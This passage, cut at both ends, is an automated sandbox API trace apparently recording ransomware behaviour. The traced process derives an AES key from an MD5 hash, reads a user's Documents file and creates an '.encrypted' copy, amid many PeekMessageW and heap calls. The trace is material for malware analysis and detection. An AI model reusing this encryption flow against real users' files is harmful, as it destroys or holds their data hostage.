lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.140] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.140] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.140] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.140] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.140] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.140] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.140] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.140] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.140] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.140] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.140] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.140] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.140] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.140] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.140] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.141] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.141] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.141] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.141] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.141] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.141] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.141] CryptHashData (hHash=0x7c2240, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.141] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.141] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.141] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.141] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.141] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.141] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.141] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.141] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0036.141] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.141] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.141] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.141] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.142] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.142] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.142] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0036.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.142] CryptDestroyHash (hHash=0x7c2240) returned 1 [0036.142] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.142] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.142] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.142] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.142] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.142] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\d4y-2lnu.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.142] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.142] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0036.142] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.142] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.143] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0036.143] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.143] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.143] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.143] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.144] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.144] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0036.144] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd")) returned 0x10 [0036.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0036.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0036.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.encrypted.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\d4y-2lnu.encrypted.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0036.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.145] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.145] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.145] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0036.146] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.146] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0036.146] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0036.147] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.147] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0036.149] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x62af, lpOverlapped=0x0) returned 1 [0036.149] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x162af) returned 0x955018 [0036.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0036.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x162af) returned 0x96b2d0 [0036.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.154] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.155] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x162af) returned 0x955018 [0036.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0036.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.156] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0036.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0036.156] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.156] RtlAllocateHeap 